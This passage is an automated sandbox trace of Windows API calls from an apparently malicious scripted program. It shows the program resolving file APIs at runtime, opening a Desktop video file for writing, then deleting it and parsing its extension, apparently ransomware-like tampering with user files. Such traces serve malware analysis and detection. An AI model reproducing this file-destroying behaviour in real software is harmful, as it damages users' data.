[0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.279] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0168.279] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.279] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0168.279] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0168.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0168.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.280] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.280] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.280] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.280] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.280] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.281] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.281] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.281] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.281] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.281] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.281] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.281] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.281] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.282] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.282] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0168.282] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0168.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0168.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd6f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0168.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\we2ef3.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.284] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.284] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.284] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.284] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0168.285] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0168.285] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0168.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0168.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0168.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0168.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0168.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0168.285] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0168.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bda08 [0168.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bda08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0168.288] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.288] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0168.288] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0168.288] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0168.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0168.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0168.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0168.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0168.289] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0168.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0168.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0168.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0168.290] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.290] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0168.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0168.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0168.291] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0168.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0168.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.291] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv", lpFilePart=0x0) returned 0x30 [0168.292] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e64a30, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x3c03b0, ftLastAccessTime.dwHighDateTime=0x1d5e2ec, ftLastWriteTime.dwLowDateTime=0x9aa98c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1659d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="wE2eF3.flv", cAlternateFileName="")) returned 0x90af58 [0168.293] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\we2ef3.flv")) returned 1 [0168.296] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e64a30, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x3c03b0, ftLastAccessTime.dwHighDateTime=0x1d5e2ec, ftLastWriteTime.dwLowDateTime=0x9aa98c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1659d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="wE2eF3.flv", cAlternateFileName="")) returned 0 [0168.296] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0168.297] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.297] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0168.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0168.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0168.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0168.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0168.297] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0168.297] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0168.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0168.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.298] HeapFree (in: 